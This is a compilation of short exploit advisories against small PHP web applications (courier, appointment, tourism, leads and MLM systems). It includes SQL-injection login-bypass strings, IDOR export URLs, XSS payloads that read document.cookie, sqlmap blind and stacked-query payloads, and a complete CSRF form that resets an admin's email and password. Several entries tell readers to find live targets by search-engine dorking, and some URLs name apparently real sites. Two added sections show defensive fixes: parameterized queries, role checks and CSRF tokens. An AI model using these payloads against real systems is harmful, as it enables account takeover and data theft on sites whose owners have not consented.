<pre><code>=============================================================================================================================================<br />| # Title : Best Courier Management System v1.0 Auth Bypass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://www.mayurik.com/source-code/P0998/best-courier-management-system-project-in-php |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking In Google Or Other Search Engine.<br /><br />[+] use payload : user : 'or''='@gmail.com & pass = 'or''='<br /><br />[+] Panel : http://127.0.0.1/gaatitrack/login.php<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Appointment Scheduler v4.0 IDOR Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://auth.phpjabbers.com/download/727641/53089/d9b13cca42bb941a9f06d96f22fb7743 |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking In Google Or Other Search Engine.<br /><br />[+] Insecure Direct Object Reference : Allows you as a visitor to access the control panel without permissions.<br /><br />[+] use payload : index.php?controller=pjAdminBookings&action=pjActionExport<br /><br />[+] http://127.0.0.1/AppointmentSchedulerDe/index.php?controller=pjAdminBookings&action=pjActionExport<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code># Exploit Title: Tourism Management System v2.0 - Cross Site Scripting (XSS)<br /># Date: 13 July 2024<br /># Exploit Author: Sampath kumar kadajari<br /># Vendor Homepage: https://phpgurukul.com/tourism-management-system-free-download/<br /># Software Link: https://phpgurukul.com/?sdm_process_download=1&download_id=7204 <br /># Version: v2.0<br /># CVE: CVE-2024-41333<br /># Tested on: Windows, XAMPP, Apache, MySQL<br /><br />-------------------------------------------------------------------------------------------------------------------------------------------<br /><br />A reflected cross-site scripting (XSS) vulnerability in Phpgurukul Tourism Management System v2.0 allows attackers to execute arbitrary code in the context of a user's browser via injecting a crafted payload into the uname parameter.<br /><br /><br /><br />"Vulnerable Code" – (/admin/user-bookings.php)<br /><br /><h2>Manage <?php echo $_GET['uname'];?>'s Bookings</h2><br /><br /><br /><br />---> Affected Component: http://localhost/tms/admin/user-bookings.php?uid=manju@gmail.com&&uname=%22%3E%3Cimg%20src/onerror=prompt(document.cookie)%3E <br /><br /><br /><br />"Fix for Vulnerable Code" <br /><br /><h2>Manage <?php echo htmlspecialchars($_GET['uname'], ENT_QUOTES, 'UTF-8'); ?>'s Bookings</h2><br /></code></pre>
<pre><code># Exploit Title: Computer Laboratory Management System v1.0 - Incorrect access control<br /># Date: 08 July 2024<br /># Exploit Author: Sampath kumar kadajari<br /># Vendor Homepage: https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html<br /># Software Link: https://www.sourcecodester.com/download-code?nid=17268&title=Computer+Laboratory+Management+System+using+PHP+and+MySQL<br /># Version: v1.0<br /># CVE: CVE-2024-41332<br /># Tested on: Windows, XAMPP, Apache, MySQL<br /><br />-------------------------------------------------------------------------------------------------------------------------------------------<br /><br />Incorrect access control in the delete_category function of Sourcecodester Computer Laboratory Management System v1.0 allows authenticated attackers with low-level privileges to perform arbitrary delete actions. <br /><br /><br />"Vulnerable Code" – (classes/master.php)<br /><br />function delete_category(){<br /> extract($_POST);<br /> $del = $this->conn->query("UPDATE `category_list` set `delete_flag` = 1 where id = '{$id}'");<br /> if($del){<br /> $resp['status'] = 'success';<br /> $this->settings->set_flashdata('success'," Category successfully deleted.");<br /> }else{<br /> $resp['status'] = 'failed';<br /> $resp['error'] = $this->conn->error;<br /> }<br /> return json_encode($resp);<br />}<br /><br />---> Affected Component: http://localhost/php-lms/classes/Master.php?f=delete_category<br /><br />"Fix for Vulnerable Code":<br /><br />function delete_category(){<br /> // Check if the user is logged in and has an admin role<br /> if (!isset($_SESSION['userdata']['role']) || $_SESSION['userdata']['role'] != 'admin') {<br /> $resp['status'] = 'failed';<br /> $resp['error'] = 'Unauthorized access.';<br /> return json_encode($resp);<br /> }<br /><br /> // Proceed with the delete action if authorized<br /> extract($_POST);<br /> $del = $this->conn->query("UPDATE `category_list` 
set `delete_flag` = 1 where id = '{$id}'");<br /> if($del){<br /> $resp['status'] = 'success';<br /> $this->settings->set_flashdata('success',"Category successfully deleted.");<br /> }else{<br /> $resp['status'] = 'failed';<br /> $resp['error'] = $this->conn->error;<br /> }<br /> return json_encode($resp);<br />}<br /></code></pre>
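Added example, not part of the advisory or the vendor's code: the fixed function above adds the role check but still calls extract($_POST) and interpolates $id into the SQL string. The sketch below keeps the same role check and binds the id as a parameter instead; PDO with an in-memory SQLite table stands in for the application's mysqli connection, and the sample rows and sessions are constructed.

```php
<?php
// Added example, not the project's code. PDO with in-memory SQLite stands in
// for the application's mysqli connection; the 'admin' role value and the
// session layout follow the fix shown in the advisory.
declare(strict_types=1);

function respond(array $resp): string
{
    return json_encode($resp, JSON_THROW_ON_ERROR);
}

function delete_category(PDO $db, array $session, array $post): string
{
    // 1. Authorization first: only a session carrying the admin role may delete.
    if (($session['userdata']['role'] ?? null) !== 'admin') {
        return respond(['status' => 'failed', 'error' => 'Unauthorized access.']);
    }
    // 2. Read only the expected key (no extract()) and require a positive integer.
    $id = filter_var($post['id'] ?? null, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return respond(['status' => 'failed', 'error' => 'Invalid category id.']);
    }
    // 3. Bind the id as a parameter instead of interpolating it into the SQL text.
    $stmt = $db->prepare('UPDATE category_list SET delete_flag = 1 WHERE id = :id');
    $stmt->execute([':id' => $id]);
    if ($stmt->rowCount() === 0) {
        return respond(['status' => 'failed', 'error' => 'Category not found.']);
    }
    return respond(['status' => 'success']);
}

// Constructed sample data and sessions for the demonstration.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE category_list (id INTEGER PRIMARY KEY, name TEXT, delete_flag INTEGER DEFAULT 0)');
$db->exec("INSERT INTO category_list (name) VALUES ('Keyboards'), ('Monitors')");

$staff = ['userdata' => ['role' => 'staff']];
$admin = ['userdata' => ['role' => 'admin']];

echo delete_category($db, $staff, ['id' => '1']), PHP_EOL;          // low-privilege session
echo delete_category($db, $admin, ['id' => '1 OR 1=1']), PHP_EOL;   // non-integer id
echo delete_category($db, $admin, ['id' => '1']), PHP_EOL;          // authorized, valid id
```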
<pre><code>[x]========================================================================================================================================[x]<br /> | Title : Leads Manager Tool SQL & XSS [stored] Vulnerabilities<br /> | Software : Leads Manager Tool Using PHP and MySQL with Source Code<br /> | Created By : https://www.sourcecodester.com/users/remyandrade<br /> | First Release: 25/01/22<br /> | Download : https://www.sourcecodester.com/php/17510/leads-manager-tool-using-php-and-mysql-source-code.html<br /> | Date : 30 August 2024<br /> | Author : OoN_Boy<br />[x]========================================================================================================================================[x]<br /> | Technology : PHP<br /> | Database : MySQL<br /> | Price : FREE<br /> | Description : Leads Manager Tool, a comprehensive web application designed to streamline the process of managing business leads. Built with the power of PHP and MySQL, this tool offers a seamless and user-friendly experience for storing, updating, and organizing lead information<br />[x]========================================================================================================================================[x]<br /><br />[O] Exploit<br /> <br /> http://localhost/leads-manager-tool/endpoint/delete-leads.php?leads=[SQL]<br /> http://localhost/leads-manager-tool/endpoint/add-leads.php<br /> <br />[O] Proof of concept<br /><br /> [SQL]<br /> Parameter: leads (GET) <br /> Type: boolean-based blind<br /> Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause<br /> Payload: leads= --emurate' RLIKE (SELECT (CASE WHEN (8305=8305) THEN 0x202d2d656d7572617465 ELSE 0x28 END))-- rUwl<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)<br /> Payload: leads= --emurate' OR (SELECT 1382 FROM(SELECT COUNT(*),CONCAT(0x7162787171,(SELECT (ELT(1382=1382,1))),0x7176706a71,FLOOR(RAND(0)*2))x 
FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- vKls<br /><br /> Type: stacked queries<br /> Title: MySQL >= 5.0.12 stacked queries (comment)<br /> Payload: leads= --emurate';SELECT SLEEP(5)#<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: leads= --emurate' AND (SELECT 1244 FROM (SELECT(SLEEP(5)))fAev)-- ZNBt<br /> <br /> [XSS] <br /> POST /leads-manager-tool/endpoint/add-leads.php HTTP/1.1<br /> Host: 127.0.0.1<br /> Accept-Encoding: gzip, deflate, br<br /> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br /> Accept-Language: en-US;q=0.9,en;q=0.8<br /> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36<br /> Connection: close<br /> Cache-Control: max-age=0<br /> Origin: http://127.0.0.1<br /> Upgrade-Insecure-Requests: 1<br /> Referer: http://127.0.0.1/leads-manager-tool/<br /> Content-Type: application/x-www-form-urlencoded<br /> Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="126", "Chromium";v="126"<br /> Sec-CH-UA-Platform: Windows<br /> Sec-CH-UA-Mobile: ?0<br /> Content-Length: 85<br /><br /> leads_name=Vrs<script>alert(1)</script>Hck&email_add=vrs-hck@maho.id&phone_number=911-911-9111<br /> <br />[x]========================================================================================================================================[x]<br /><br />[O] Greetz<br /><br />BatamHacker, Vrs-hCk, c0li, h4ntu, Opay, Ndet, Ipay, Paman, NoGe, H312Y, dono, pizzyroot, zxvf, Joe Chawanua, k0rea [Ntc],xx_user, s3t4n, Angela Chang, IrcMafia, str0ke, em|nem, Pandoe, Ronny ^s0n g0ku^<br /><br />[x]========================================================================================================================================[x]<br /><br /><br /></code></pre>
<pre><code>[x]========================================================================================================================================[x]<br /> | Title : Readymade Unilevel Ecommerce MLM Blind SQL & XSS Vulnerabilities<br /> | Software : Readymade Unilevel Ecommerce<br /> | Last Update : 15/03/24 [TESTED VERSION SCRIPT]<br /> | First Release: 16/11/21<br /> | Vendor : http://www.i-netsolution.com/<br /> | Date : 01 August 2024<br /> | Author : OoN_Boy<br />[x]========================================================================================================================================[x]<br /> | Technology : PHP<br /> | Database : MySQL<br /> | Price : $500<br /> | Description : MLM Unilevel Plan Script developed by experts and professionals. Rather than building your business from the scratch, make use of our Unilevel MLM PHP Script to launch your MLM business.<br />[x]========================================================================================================================================[x]<br /><br />[O] Exploit<br /> <br /> http://localhost/eommlm/product-details.php?id=11[SQL]<br /> http://localhost/ecomlm/product-details.php?id=11[XSS]<br /> <br />[O] Proof of concept<br /> <br /> sqlmap.py -u "http://localhost/eommlm/product-details.php?id=11" --invalid-string<br /> <br /> [SQL]<br /> Parameter: id (GET)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: id=11 AND 1189=1189<br /><br /> Type: stacked queries<br /> Title: MySQL >= 5.0.12 stacked queries (comment)<br /> Payload: id=11;SELECT SLEEP(10)#<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: id=11 AND (SELECT 6812 FROM (SELECT(SLEEP(10)))DddL)<br /><br /> <br /> [XSS] <br /> http://localhost/ecomlm/product-details.php?id=11"><img/src/onerror=.1|alert`VrsHckGAY`+class=VrsHckGAY><br /> <br 
/>[x]========================================================================================================================================[x]<br /><br />[O] Greetz<br /><br />BatamHacker, Vrs-hCk, c0li, h4ntu, Opay, Ndet, Ipay, Paman, NoGe, H312Y, dono, pizzyroot, zxvf, Joe Chawanua, k0rea [Ntc],xx_user, s3t4n, Angela Chang, IrcMafia, str0ke, em|nem, Pandoe, Ronny ^s0n g0ku^<br /><br />[x]========================================================================================================================================[x]<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Appointment Scheduler v3.0 IDOR Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://auth.phpjabbers.com/download/727641/53089/d9b13cca42bb941a9f06d96f22fb7743 |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking In Google Or Other Search Engine.<br /><br />[+] Insecure Direct Object Reference : Allows you as a visitor to access the control panel without permissions.<br /><br />[+] use payload : index.php?controller=pjAdminBookings&action=pjActionExport<br /><br />[+] http://127.0.0.1/www/ wongkit.com.hk/appointment/index.php?controller=pjAdminBookings&action=pjActionExport<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : AccPack Cop v1.0 CSRF Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : http://webpay.com.np/#Product |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking In Google Or Other Search Engine.<br /><br />[+] The following HTML code modifies the admin information.<br /><br />[+] Go to line 5. Set the target site link, save changes and apply. <br /><br />[+] infected file : cms/user/modify.php.<br /><br />[+] http://127.0.0.1/q7.3/cms/user/modify.php.<br /><br />[+] save code as poc.html <br /><br />[+] payload : <br /><br /></head><br /><body><br /> <div class="container"><br /> <div class="text-center" style="padding: 5px"><h3>User Edit</h3></div><br /> <form action="https://tssclahanorgnp/cms/user/modify.php" method="POST" enctype="multipart/form-data"><br /> <div hidden="true"><br /> <input type="text" name="id" id="id" value="1"><br /> </div><br /> <div><br /> <label for='email'>Email</label><input type="text" class="form-control" name='email' id='email' value="indoushka@mail.dz"><br /> </div><br /> <div><br /> <label for='password'>Password</label><input type="text" class="form-control" name='password' id='password' type='password' value="123456"><br /> </div><br /> <tr><br /> <div><br /> <label for='status'>Status</label><br /> <input type="radio" name="status" id="actiive" value="1" checked /> <label for="active">Active</label><br /> <input type="radio" name="status" id="passive" value="0" /><label for="passive">Passive</label><br /> <br /> </div> <br /> <div style='height:80'><br /> <input type='submit' value='Submit'><input type='reset' Value='Reset'><br 
/> </div><br /> </form><br /> </div><br /><br /></body><br /></html><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
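Added example, not AccPack's code: a cross-site form like the one above works when the handler acts on any POST that arrives with the administrator's session cookie. A per-session token that the foreign page cannot read closes that gap; the handler name, the session keys and the `csrf` field name below are assumptions, and the request arrays are constructed.

```php
<?php
// Added example, not the vendor's code. handle_modify(), the 'user_id' and
// 'csrf' session keys and the 'csrf' form field are hypothetical names.
declare(strict_types=1);

// Create the per-session token once; the edit form embeds it in a hidden field.
function csrf_issue(array &$session): string
{
    if (empty($session['csrf'])) {
        $session['csrf'] = bin2hex(random_bytes(32));
    }
    return $session['csrf'];
}

// Constant-time comparison of the submitted token with the session's copy.
function csrf_check(array $session, array $post): bool
{
    $sent = $post['csrf'] ?? '';
    $expected = $session['csrf'] ?? '';
    return is_string($sent) && is_string($expected) && $expected !== ''
        && hash_equals($expected, $sent);
}

// Gatekeeping that would sit at the top of a state-changing handler.
function handle_modify(array $session, string $method, array $post): array
{
    if ($method !== 'POST') {
        return [405, 'Method not allowed'];
    }
    if (empty($session['user_id'])) {
        return [401, 'Login required'];
    }
    if (!csrf_check($session, $post)) {
        return [403, 'CSRF token missing or invalid'];
    }
    // Only now would the handler validate and apply id, email, password, status.
    return [200, 'Profile change accepted'];
}

// Constructed requests: the cross-site form can send the fields but not the token.
$session = ['user_id' => 1];
$token = csrf_issue($session);
$fields = ['id' => '1', 'email' => 'user@example.test', 'password' => 'placeholder', 'status' => '1'];
$requests = ['cross-site form' => $fields, 'own edit form' => $fields + ['csrf' => $token]];

foreach ($requests as $label => $post) {
    [$code, $message] = handle_modify($session, 'POST', $post);
    printf("%-16s -> %d %s\n", $label, $code, $message);
}
```

Issuing the session cookie with the SameSite attribute set to Lax or Strict adds a second, browser-enforced layer on top of the token.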
<pre><code>=============================================================================================================================================<br />| # Title : AccPack Buzz v1.0 Auth Bypass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : http://webpay.com.np/#Product |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking In Google Or Other Search Engine.<br /><br />[+] use payload : user & pass = ' or 0=0 ##<br /><br />[+] Panel : http://127.0.0.1/jamiatulamanepal.orgnp/cms/<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Availability Calendar v5.0 IDOR Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://auth.phpjabbers.com/download/727464/53089/4086bea551934539d536dcb3899ddbe8 |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking In Google Or Other Search Engine.<br /><br />[+] Insecure Direct Object Reference : Allows visitors to preview Calendar.<br /><br />[+] use payload : preview.php?cid=all&locale=<br /><br />[+] http://127.0.0.1/AvailabilityCalendar/preview.php?cid=all&locale=<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>